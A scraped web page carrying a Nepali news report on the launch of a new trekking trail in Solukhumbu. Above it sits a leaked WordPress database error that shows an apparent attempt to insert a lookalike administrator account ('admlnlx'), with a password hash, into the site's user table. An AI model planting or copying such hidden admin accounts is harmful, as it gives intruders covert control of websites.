WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmS6XOUdzOjnTvmZjtbtn.cSHOx.Bx0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 11:07:47', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको माप्य दुधकोशी गाउँपालिकाले नयाँ पर्यटकीय पदमार्ग "एभरेस्ट–दुधकोशी कल्चरल ट्रेल"को औपचारिक सुरुवात गरिएको छ । नेपाल पर्यटन बोर्ड तथा ट्रेकिङ एजेन्सिज एशोसियसन अफ नेपाल (टान) को सहकार्यमा संचालित जीविकोपार्जन पुर्नउत्थानका लागि दिगो पर्यटन (STLRP) को आर्थिक सहयोगमा निर्माण गरिएको सो पदमार्गको काठमाडौंको भृकुटीमण्डपस्थित पर्यटन बोर्डमा सोमबार आयोजित कार्यक्रममा प्रमुख अतिथि रक्षामन्त्री मानबीर राईले पानसमा बत्ती बालेर औपचारिक सुरुवात गरेका हुन् । गाउँपालिका अध्यक्ष बुद्धिकिरण राईको अध्यक्षतामा सम्पन्न कार्यक्रममा सो पदमार्गसम्बन्धी वृत्तचित्र, आइटेनरी तथा प्रचारमूलक सामाग्रीहरू समेत सार्वजनिक गरिएको [...]